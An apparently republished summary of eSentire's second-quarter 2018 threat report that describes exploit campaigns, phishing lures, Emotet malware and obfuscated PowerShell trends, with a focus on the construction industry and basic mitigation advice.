According to eSentire’s 2018 Second Quarterly Threat Report, construction is in the top five industries vulnerable to cyberattacks due to outdated internal systems.
In order of vulnerability, biotechnology, accounting, real estate, marketing and construction experienced the most cyberattacks. These industries may not be updating their systems for fear it will change or break something, they are unaware that a patch is necessary or underestimate the gravity of failing to patch. The attackers may be trying to drive ad revenue or adopt compromised servers into their attack infrastructure.
Figure 1 Top five industries experiencing verified hostile traffic.
During the quarter, eSentire observed successful exploit attempts like Drupalgeddon2 and EternalBlue intrusions due to misconfigurations or absence of routine patching. There also was an increase in phishing attacks that used shipping invoice lures.
EXPLOIT CAMPAIGNS
eSentire identified a massive uptick in Microsoft Internet Information Services (IIS) attacks, from 2,000 in Q1 2018 to 1.7 million in Q2 2018, which are expected to continue into Q3 2018. According to Shodan1, there were 3.5 million internet Information web servers exposed that largely originated from Tencent and Alibaba, both Chinese companies.
Drupal and Oracle WebLogic web technologies also experienced increased attacks. Attacks against IIS and WebLogic likely originate from infrastructure that contains a large number of compromised Apache servers, among other publicly exposed servers.
Construction experienced a large amount of Drupalgeddon2 attacks. All five of the top industries experienced a larger share of information gathering events (scans) versus other industries, further indicating a more exposed threat surface. Another common web exploit for all of these industries was the Apache Struts OGNL Expression Injection (CVE-2017-5638), which was highest in Accounting Services. This exploit gained popularity following its usage in the Equifax breach.
Phishing
Construction experienced the largest amount of confirmed phishing attacks, largely attributed to DocuSign, which contractors use for digital invoices and quotes.
Figure 2 Phishing Lures Used Across Industries
Figure 3 Quarter over quarter change in lures used for phishing
Employees are more likely to click on phishing links Tuesday through Thursday. They are less likely to click links or less likely to submit credentials on Friday, likely a result of diminishing productivity near the weekend.
Figure 4 Distribution of phishing clicks (left) and credential submission (right) throughout the workweek. Percentages represent what fraction of all phishing incidents took place on that day
MALWARE
Malicious Document Lures
Figure 5 Popular lures for malicious documents
Construction ranks fourth in malware events. Emotet is a sophisticated malware popular with hackers. Forty-nine percent of Emotet samples included “invoice,” “payment” or “account” in their filename. The filenames of unspecified documents often consisted only of random strings of numbers and letters. The context for these documents were likely in the body of the email message used to deliver the document. A small number (2 percent) of Emotet documents were disguised as IRS forms. For Emotet’s competitor, Hancitor, fax documents were the popular lure (25 percent).
Malicious documents (such as .pdf and .doc files) are modified to carry malicious payloads. Download and execution of the malware may only require that the document be opened. Most malicious documents arrive at an organization through email spam but can sometimes be downloaded from malicious websites.
Figure 6 Malware Events Observed across industries
Emotet – A Matured Malware
Emotet was first observed in 2014, functioning as a banking trojan, but has since evolved into a sophisticated and modular malware downloader, typically used to deliver other banking trojans while still retaining its own functionality as a banking trojan. Malicious documents carrying the Emotet downloader are disguised as business-critical documents, such as invoices, shipping forms and IRS tax forms.
Emotet used its worm capability to spread to internal systems through additional phishing emails and SMB enumeration. Organizations that leave SMB open, use simple passwords and reuse passwords across services are susceptible to Emotet propagating across their network. Even when passwords are not successfully guessed, brute-force behavior can cause lock-outs. Emotet is considered a serious, sophisticated and impending threat. The best defense starts with employee hygiene around emails and webpages.
Protecting Against Emotet
To mitigate worming capabilities, SMB communications between systems in a network should be restricted via group policy settings or in the configuration of Host-based Intrusion Prevention Systems (HIPS). For example, create a group policy that restricts inbound client-to-client SMB connections.
To mitigate spread through automated phishing, known malspam indicators (including subject lines, body text, domains and IP addresses), should be blocked via email security appliances.
The principal of least privilege is a general security best practice with implications beyond Emotet. Ensure that each user has the minimal permissions required to complete objectives and that administrative privileges are restricted to designated administrative personnel.
Reputation Blocks Across Industry
Reputation blocks, which are built into the internet services, keep harmful material out of emails, warn about phishing attempts and keep viruses off organization’s networks. They occur when known bad IPs are detected trying to establish connections with monitored clients. The majority of these IPs earn their negative reputation through opportunistic scanning and exploitation attempts, so reputation block volume serves as a proxy for industry exposure and also can indicate some degree of targeting. For example, construction has large threat surfaces. Why?
Figure 7 Reputation Blocks observed in Q2
EXPLOIT CAMPAIGNS
PowerShell is a popular execution technique. Obfuscated malicious PowerShell commands increased 50 percent in Q2 2018 with intrusion attempts making up a large portion of attacks observed by eSentire. Most of these attempts targeted commonly used web technologies, such as IIS (30 percent), WebLogic (24 percent) and Apache (less than 1 percent). A high volume of exploit attempts does not typically indicate one industry is targeted over another. Rather, it is representative of their exposure to opportunistic attacks.
Most IIS exploit attempts were coupled with attempts against Oracle’s WebLogic service (CVE-2017-10271). It is unclear whether these exploit campaigns were related to cryptomining.
The second quarter of 2018 was host to many exploit campaigns with some indication that the Muhstik botnet may have played a role in Drupalgeddon2, WebLogic exploits and GPON exploits. While numerous Apache Struts and PHP web server attempts were scattered throughout the quarter, four main exploits were observed targeting IIS, Drupal and WebLogic servers, as well as GPON routers.
Attack Infrastructure for WebLogic and IIS Exploits
Use of compromised hosts for launching attacks reduces the effectiveness of reputation-based controls and complicates attribution efforts by threat researchers. Investigation was performed on attacking infrastructure using Shodan’s historical records.
Throughout Q2 2018, eSentire observed IIS and WebLogic attacks originating from servers hosting Apache, RDP, SQL, IIS and HTTP API services. Most of the records included known potential vulnerabilities based on server software version. Vulnerability records for attacking servers showed a steady increase. The majority of this growth appeared to come from Apache HTTP Servers, version 2.4.23. In the same period, records reporting vulnerabilities in IIS 7.5 and HTTP Server 2.4.10 appeared to diminish.
Besides the top five servers, there was an interesting collection of operating systems among the attacking infrastructure involved – more than 400 of the attacking IPs had Shodan records indicating they were Windows machines (including XP, 7, 8, 2008, and 2012). Additionally, nearly 350 FTP servers and more than 100 mail servers were reported; there also were VPN servers, MikroTik devices (reported as bandwidth-testing servers), Kangle, Squid, Jetty, and a handful of lesser-known web service technologies.
In the first quarter of 2018, Recorded Future reported a combination of compromised MikroTik, Apache, and IIS devices performing DDoS attacks as part of a Mirai botnet. It is conceivable that several botnets played a role in exploit campaigns observed over the second quarter. The tendency for threat actors to compromise and recruit any available devices is a recent trend that increases the resiliency of the botnet’s infrastructure against takedowns. Automation of compromise procedures helps the botnet maintain growth, therefore sustaining high attack volumes.
The severity of credential theft often relates to what services’ credentials were compromised and how integrated the service is with the victim business. For example, theft of Facebook credentials is more likely to affect an employee’s personal life than disrupt business functions, but theft of DocuSign or Dropbox credentials could have serious impact on a business. When credentials are reused for multiple accounts in an organization or service, compromise of those credentials can have even more severe implications.
ENDPOINT EVENTS
Figure 8 Different techniques observed in attacks on endpoints
Not surprisingly, endpoint solutions detected a large degree of Emotet malware, but malicious PowerShell scripts constituted the majority of events. However, because Emotet utilizes PowerShell, it is likely that some PowerShell detections are the result of Emotet. Use of obfuscated PowerShell commands increased 50 percent from last quarter, partly due to contributions by Emotet.
Endpoint solutions facilitate observation of execution, evasion, and persistence tactics. Among execution tactics, the most common technique observed was the use of PowerShell at 32 percent, followed by VBA Scripting at 21 percent. Leveraging trusted processes, such as mshta and regsvr32, was also popular. Of the PowerShell-based attacks observed, 83 percent used obfuscated command lines in an attempt to hide their intentions.
Obfuscated PowerShell
Overall use of PowerShell held steady, but tactics employed by malware continue to evolve. Observations of malicious PowerShell in Q2 2018 showed a slight decrease in unique PowerShell commands (48 in Q1 versus 44 in Q2) and a corresponding 2 percent decrease in obfuscation techniques. About half of malicious PowerShell events tend to utilize command obfuscation. The use of multiple obfuscation tactics in each event increased 20 percent, demonstrating increased sophistication over the previous quarter.
Among techniques observed, character arrays, string joins and secure string to BSTR increased for the quarter. The split technique was not observed in Q1, but five instances were captured for Q2. Encoded commands, invoked expressions, and stream compression were on the decline.
